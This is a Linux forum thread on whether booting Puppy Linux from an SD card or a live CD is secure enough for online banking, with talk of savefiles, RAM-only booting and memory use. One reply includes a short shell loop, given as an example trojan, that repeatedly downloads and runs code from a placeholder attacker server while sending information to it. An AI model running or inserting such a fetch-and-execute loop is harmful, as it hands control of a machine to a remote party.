I wish to know if booting from a SD card is as secure as booting from a live CD. I have tried booting with the switch on the SD card turned to lock (no writing to SD card) but Puppy dont finish booting. Firewall is always on. Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted.
Sometimes when internet banking I 'show desktop' to see if any of the drive icons are lit up. I notice that when Puppy is starting up it can peer into the drives to find the savefiles. Does that mean that once a cracker is inside ones box they could do the same.
How secure is booting from internal SD card?
If you can find a way for a 'cracker' to get into yer puppy then start panicking.
Done internet banking on windows and linux for many years...running mainly from hard drive.
One caveat...NEVER EVER use Internet Explorer/Outlook Express which would be difficult on linux anyway.
No saved passwords and I suppose you could go for a don't save at shutdown option if it makes you feel better.
Your sdcard will be fine.....only real danger is someone stealing yer SD card if you DID save passwords By the way my bank logs in without using passwords but instead a series of random predefined questions...seems a better idea.
No firewall apart from the one in the router which shows as stealth on shields up.
mike
Done internet banking on windows and linux for many years...running mainly from hard drive.
One caveat...NEVER EVER use Internet Explorer/Outlook Express which would be difficult on linux anyway.
No saved passwords and I suppose you could go for a don't save at shutdown option if it makes you feel better.
Your sdcard will be fine.....only real danger is someone stealing yer SD card if you DID save passwords By the way my bank logs in without using passwords but instead a series of random predefined questions...seems a better idea.
No firewall apart from the one in the router which shows as stealth on shields up.
mike
Yes.Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted.
Many cracks are like vamp's - they gain access by being invited in. Trojans that piggy-back into your system. A really simply virus could be as trivial as a repeated while loop - perhaps something along the lines of
while :
do
wget attackers_server/filename?somestring >/tmp/try
chmod a+x /tmp/try
/tmp/try &
sleep 3
done
that repeatedly tries code (script) sent from the hackers server (and that also gets fed some info in the somestring parameter passed to that server (I know, not the best of example scripts, but you get the idea)).
An intent hacker would obviously utilise something a lot more sophisticated. Low level code that might not even reveal that a drive had been mounted. Not even read only boot CD's are immune to such risk as the process could have been 'downloaded' to and be running in memory. The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site, as that greatly reduces the risk of catching such a virus.
If the opsys and/or browser have been used to visit any other web sites (or read emails, install progs etc.) at any prior time whilst having write access enabled, then there is a risk that it could have been compromised. Obviously a read only CD is more assured in that sense.
Another trick is to spoof your opsys and browser. Change the USER-AGENT from telling every site you visit that your running x version of linux and y version of browser to I'm running Windows and another version (or type) of browser. You want the spoofed choices to be relatively close to what you are running otherwise you'll hit problems with some web sites throwing you content that's inappropriate to your actual setup (or refusing to provide content because they don't know how to handle that choice of opsys/browser).
I've previously sidestepped your repeated statements such as above Mike as I have no desire to cause upset nor argument. However you repeatedly say that you've been running Windows and Linux with minimal protection and not encountered problems yourself, stressing that its primarily just Windows and in particular Explorer/Outlook that are the risks - but its been widely accepted for years that the risks are more widespread. http://www.internetnews.com/dev-news/ar ... hp/3601946 Nor is running Linux inherently safe for the more casual user.mikeb wrote:Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable an then run.... and don't even bother asking for actual instances of this happening.
Yes the risks have been reduced by centralising software distribution via responsibly run/maintained repositories - but not all users obtain all of their software solely via such verified/content-validated repositories.
I've only been using Linux LiveCD's for a couple of months and in the early days of that whilst looking around for an appropriate choice found some distro's with 8+ rootkits being reported.
Real and present.
ok details would be interesting...not just for me but as a warning for others.8+ rootkits being reported.
I hear lots of talk and potential threats...but details of real occurrences would be a real bonus to quantify and clarify the situation.
I am serious about security...i dont want viruses...just happens my approach seems simple and effective. I could claim it gives MAXIMUM protection since my results are better than those who run antivirus software.
Mike
The main threat to computer security is ... keyboard.
The only way left after other measures have been taken.
Does this not bring us to the running as root argument ...after all not running as administrator on windows is considered prudent.?
Bit torrent and gnutella is the home of manually installed windows viruses...are linux repos going to be the same?
mike
The only way left after other measures have been taken.
Does this not bring us to the running as root argument ...after all not running as administrator on windows is considered prudent.?
Bit torrent and gnutella is the home of manually installed windows viruses...are linux repos going to be the same?
mike
'No saved passwords and I suppose you could go for a don't save at shutdown option'
I dont save passwords but with Firefox that also seams to mean not to save form information also.
'The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,'
Thats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.
'Obviously a read only CD is more assured in that sense.'
Exactly, if only some one would make a 64 bit Slick Puppy with only, full networking so that every different modem could get online, firewall, Geany for saveing details of receipts, Firefox or chrome, most secure browsers, mpaint for taking a snapshot of the screen before and after pressing the submit button, even just vesa so that there is no need to lump around 30 mb of video card firmware.
'Another trick is to spoof your opsys and browser. Change the USER-AGENT'
Havent got a clue what a user agent is, but you are seaming to say it is not the way to go.
'No firewall apart from the one in the router which shows as stealth on shields up.'
Been to shield up with previous Puppies, dont know enough about ports to understand what shield up is saying but Puppys firewall shows up as being stealthy.
'The main threat to computer security is the person using the keyboard.'
Thats a lot of help!! BUT you are talking about me and a lot of people who use Puppy for banking and the like that dont know how ports are hardwired into a computer (or operating system.)
I have looked into the Fatdog CD in the help folder, help.msg and I cant see a line for booting into Ram but using the save file on SD card for my window settings, ect, only, not for saving to while on the net.
Is it possible to boot from SD card into ram, BUT using the savefile on the SD card BUT keeping the SD card READ only. As far as I can understand a live cd boots into ram and only saves data if one chooses on shutdown. After I finish banking using live cd, I close the browser, my data is still in ram, then I go off the net, data is still in ram, then I open Fatdog from the desktop icon (hoping that it hasnt been opened while I was on the net) and then send my data in ram to Fatdog on the hard drive. Can this be done with a SD card, (built in SD slot seen as an internal drive seen as sdb1 not USB.
I dont save passwords but with Firefox that also seams to mean not to save form information also.
'The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,'
Thats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.
'Obviously a read only CD is more assured in that sense.'
Exactly, if only some one would make a 64 bit Slick Puppy with only, full networking so that every different modem could get online, firewall, Geany for saveing details of receipts, Firefox or chrome, most secure browsers, mpaint for taking a snapshot of the screen before and after pressing the submit button, even just vesa so that there is no need to lump around 30 mb of video card firmware.
'Another trick is to spoof your opsys and browser. Change the USER-AGENT'
Havent got a clue what a user agent is, but you are seaming to say it is not the way to go.
'No firewall apart from the one in the router which shows as stealth on shields up.'
Been to shield up with previous Puppies, dont know enough about ports to understand what shield up is saying but Puppys firewall shows up as being stealthy.
'The main threat to computer security is the person using the keyboard.'
Thats a lot of help!! BUT you are talking about me and a lot of people who use Puppy for banking and the like that dont know how ports are hardwired into a computer (or operating system.)
I have looked into the Fatdog CD in the help folder, help.msg and I cant see a line for booting into Ram but using the save file on SD card for my window settings, ect, only, not for saving to while on the net.
Is it possible to boot from SD card into ram, BUT using the savefile on the SD card BUT keeping the SD card READ only. As far as I can understand a live cd boots into ram and only saves data if one chooses on shutdown. After I finish banking using live cd, I close the browser, my data is still in ram, then I go off the net, data is still in ram, then I open Fatdog from the desktop icon (hoping that it hasnt been opened while I was on the net) and then send my data in ram to Fatdog on the hard drive. Can this be done with a SD card, (built in SD slot seen as an internal drive seen as sdb1 not USB.
By definition, a save-file has to be read-write -at least at the time of saving. and booting to RAM usually means starting with a clean slate -without your saved network settings (and others).
In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
533t_vesa_mesa.iso (or 533t_nvidia.iso for systems with Nvidia graphics card) weighs in at 250MB (260MB), but only around 100MB for the Puppy ISO part (rest is extra's i.e. SFS's that can be loaded for flash, abi/gnumeric, openshot/audacity). https://drive.google.com/folderview?id= ... sp=sharingThats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,
i.e. puppy sfs is around 70MB with another 25MB of drivers (zdrv sfs).
Typically takes less than 3 minutes (obviously with familiarity, longer for first time/learning) to get to banks web site via : boot CD, at desktop click connect and establish internet connection, open HOME and run quick_firewall_and_sound, set locale (restartX) and download/load latest firefox (HOME firefox file). That is however via a reasonably fast internet link (firefox download is around 30MB and on my 50Mb link speed takes just a few seconds to download).
Go to bank/online accounts - no where else before or after. Shutdown/reboot afterwards. i.e. booted from read only CD into RAM, new browser downloaded into and run from RAM, nowhere else before or after other than bank web site, HD's not even mounted.
For other stuff, boot as normal, load up abiword/gnumeric, flash, multi-media and use as desired. Encounter a virus and shutdown/restart and you're back to a clean system again.
I save all data (spreadsheets, documents etc) to a HD (could be a USB i.e. outside of Puppy space), so persistence from one session to another isn't required (no save file). I do also have a portable-firefox on the HD so that all bookmarks, extensions etc come all ready to go, but I run that with it in the back of my mind that its potentially unsafe.
The somewhat crude guide document (PDF) I've created for those that 'distro' is located at https://drive.google.com/file/d/0B4MbXu ... sp=sharing
Just timed the larger one (nvidia, Puppy SFS 78MB, drivers 34MB) and from complete power off to having a browser window up/running (booted, connected, firewall, set locale, restart x, download firefox) took 2 mins 40 seconds (25 seconds of that was the time to load the puppy sfs from CD during the boot process).
Not that unpractical ?!
Not that unpractical ?!
Yes that got messed up with firefox 3.5 plus... my semi fix is to click 'clear history when closes.'.. tick what you want and advanced and then unclick it again.. seems to make form saving work without passwords then as otherwise it does not do what the settings says it should.I dont save passwords but with Firefox that also seams to mean not to save form information also.
A bit like cookie blocking only seems to work when you are in cookie approval mode.
Shields up... well thats probably your router doing its job which is stealth = hidden
I just boot normal system and bank online.
I drink tap water too
mike
I boot ram each and every time, so 'savefile' space is all of RAM (select the 'dont save' option at shutdown). So each and every session is pristine new. If I'm banking, I download the latest firefox direct from Mozilla, no plug-ins or extensions, go straight to banks web site, no where else either before or after (shutdown/reboot to clear memory). No HD's even mounted, all running in RAM from read only CD/DVD.amigo wrote:By definition, a save-file has to be read-write -at least at the time of saving. and booting to RAM usually means starting with a clean slate -without your saved network settings (and others).
In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
That's comparable to a frugal puppy pfix=ram - where no save file is loaded. Perhaps a bit safer because with frugal the puppy sfs (and drivers) might be being read from a read/write device (hard disk) assuming you had those copied over when you set up the frugal (even with frugal however you can overwrite that with a pmedia boot parameter).
As Mike suggests however, don't worry too much about it, there are plenty of bigger fish that hackers/thiefs will go after. If caught hacking the penalties are high, and it can be very difficult for them to completely cover their tracks - so instead they're more likely to go after easier/more rewarding prey (cash/ATM points, card scanning etc.).
I only run things the way I do because I don't like full installs as I often mess things up and getting back to how things were before is more of a pain with full installs IMO (I don't back up as often as I should and things always seem to trash when its been too long since I did a backup (or the backup fails to recover). I also don't like running with GRUB and would rather the HD was untouched other than whatever data files I opt to read/write to the HD. Also with savefiles even though if I keep regular backups, I either seem to exhaust savefile space at inopportune times and/or I get mixed up with which historic version I need to roll back to to get back to a 'how it was before - but not having lost too much stuff' state. I find that overall keeping opsys/gui (CD) completely separate from data (HD) works best for me (LiveCD).
I'm casual about where I surf to when in non-banking mode/sessions, caring little about the repercussions of what I try or do (PET's etc) as I know that the next session will be back to the original form. With full installs a single slip can result in having to spend an hour or more undoing/repairing stuff.
- Attachments
-
- dt.jpg
- (66.64 KiB) Downloaded 223 times
hmm ...drifting into the area of save methods.... my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to i can choose not to save at shutdown so will revert to the last save on the next boot...handy when testing software for example but would provide a 'no save ' environment if desired... basically used the multisession cd idea and applied it to hard drive and usb use.
As mentioned it all becomes pretty unbreakable. Save space = ram plus swap space in effect so works a little differently and not overusing the save space is a good idea anyway.
It also means in usage terms its no different to a save file when it comes to boot times and convenience.
A variant on this theme is making a sfs of say a first run and using that... a snap shot of the basic setup in other words.
Or make a remaster just for the purpose and include system settings. (/etc)
SD card save means the save file is mounted so the card cannot be released even though changes are in ram/tmpfs.
The tmpfs is copied to the save file periodically unless disabled and at shutdown unless bypassed.
mike
As mentioned it all becomes pretty unbreakable. Save space = ram plus swap space in effect so works a little differently and not overusing the save space is a good idea anyway.
It also means in usage terms its no different to a save file when it comes to boot times and convenience.
A variant on this theme is making a sfs of say a first run and using that... a snap shot of the basic setup in other words.
Or make a remaster just for the purpose and include system settings. (/etc)
SD card save means the save file is mounted so the card cannot be released even though changes are in ram/tmpfs.
The tmpfs is copied to the save file periodically unless disabled and at shutdown unless bypassed.
mike
Sounds interesting, but over my head. Is that creating a sfs of /initrd/pup_rw using something like mksquashsfs at shutdown and then loading that sfs at bootup?my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to i can choose not to save at shutdown so will revert to the last save on the next boot.
If so my /initrd/pup_rw is 1750MB total with 125MB used - I would have thought that it could take quite a while to 'shutdown' (create sfs) ???
One thing that's bothered me is that despite having 1.5GB of RAM, my 'savefile' icon in the tray always shows that 1.7GB in total available. Is it just assigning 200MB out of the 2GB swap partition space I've created/allocated? At the time I just created swap to be larger than the amount of actual memory, thinking that was a reasonable choice. But perhaps 200MB might have been a better choice ?
Yes the tmpfs layer must be adding swap space to calculate its size and can therefore be larger than your actual ram.
No harm in having a larger swap although its obviously going to use some of your hard drive. As you can see you have plenty of room though without the swap the tmpfs has to be shared with software ram usage and /tmp, shm etc if used.... eg in your case a figure of ~900MB is more likely for pup_rw without swap. I quite like having room to spare as its handy for such as printing and some flash video.
In your case the 125MB of data would be saved (such as /tmp are not which may be in that 125mb).... I normally use it uncompressed so its the time it takes to write 125mb... about 2 seconds on my crusty olde systems. To usb would be slower I expect and light compression might be worth considering...there are some builds of mksquashfs using low compression for sfs which adds aroud 20% but gives a major speed increase and of course reduces the file to be saved compared to uncompressed...something I have toyed with. (originally I used tar but puppies initrd only supported a crappy version of it)
Another one to consider are things like browser caches being saved so always worth looking at ways to keep trim. My saves are usually between 30 and 60MB which only takes half a second to create and load.
All good stuff
Mike
No harm in having a larger swap although its obviously going to use some of your hard drive. As you can see you have plenty of room though without the swap the tmpfs has to be shared with software ram usage and /tmp, shm etc if used.... eg in your case a figure of ~900MB is more likely for pup_rw without swap. I quite like having room to spare as its handy for such as printing and some flash video.
In your case the 125MB of data would be saved (such as /tmp are not which may be in that 125mb).... I normally use it uncompressed so its the time it takes to write 125mb... about 2 seconds on my crusty olde systems. To usb would be slower I expect and light compression might be worth considering...there are some builds of mksquashfs using low compression for sfs which adds aroud 20% but gives a major speed increase and of course reduces the file to be saved compared to uncompressed...something I have toyed with. (originally I used tar but puppies initrd only supported a crappy version of it)
Another one to consider are things like browser caches being saved so always worth looking at ways to keep trim. My saves are usually between 30 and 60MB which only takes half a second to create and load.
All good stuff
Mike
Thanks.
I'll stick with just running in ram - with the option to create a savefile as and when needed (until another remastered puppy sfs is performed).
One thing I've just noticed is that under load/stress testing, running with ram uses a lot less of memory space than when running with a savefile. Loaded up Openshot running blender to create a 3D animated title, mplayer watching a video, firefox with one window running a youtube, another watching BBC news video, a range of others on other web sites; abiword, gnumeric, galculator, leafpad, mtpaint all running; audacity loaded, xvidcap running to capture the desktop video (screencast) - and in total got up to using just over 700MB of memory according to HTOP - with all of 4MB of swap having been used.
From what I remember, running with a savefile and memory usage was higher when loaded up to a similar heavy load.
More a case of the single CPU being the bottleneck (100% loaded), memory much less of a issue.
I'll stick with just running in ram - with the option to create a savefile as and when needed (until another remastered puppy sfs is performed).
One thing I've just noticed is that under load/stress testing, running with ram uses a lot less of memory space than when running with a savefile. Loaded up Openshot running blender to create a 3D animated title, mplayer watching a video, firefox with one window running a youtube, another watching BBC news video, a range of others on other web sites; abiword, gnumeric, galculator, leafpad, mtpaint all running; audacity loaded, xvidcap running to capture the desktop video (screencast) - and in total got up to using just over 700MB of memory according to HTOP - with all of 4MB of swap having been used.
From what I remember, running with a savefile and memory usage was higher when loaded up to a similar heavy load.
More a case of the single CPU being the bottleneck (100% loaded), memory much less of a issue.
- Attachments
-
- load_heavy.jpg
- (83.58 KiB) Downloaded 372 times
Cant remember if this was a usb or hard drive save file in your case.
Tmpfs/pup_rw does not show up in memory usage but the kernel still accounts for it.... soo if you are running in ram only, that which is free for applications will be reduced and such apps will normally request less memory or the kernel will make it so (watch for example how firefox usage drops if something else fills yer ram. ) With a save file and no tmpfs (hard drive) then more ram is available therefore apps can take more cos they can....so it can appear as if more is being USED but really more is being ALLOCATED because more is available.
That's just a simplistic view but you get the idea, I hope, of why there appears to be a variance... the demands of aufs will be pretty much the same and usually amounts to only a few MB.
Hope that makes some sense.
mike
Tmpfs/pup_rw does not show up in memory usage but the kernel still accounts for it.... soo if you are running in ram only, that which is free for applications will be reduced and such apps will normally request less memory or the kernel will make it so (watch for example how firefox usage drops if something else fills yer ram. ) With a save file and no tmpfs (hard drive) then more ram is available therefore apps can take more cos they can....so it can appear as if more is being USED but really more is being ALLOCATED because more is available.
That's just a simplistic view but you get the idea, I hope, of why there appears to be a variance... the demands of aufs will be pretty much the same and usually amounts to only a few MB.
Hope that makes some sense.
mike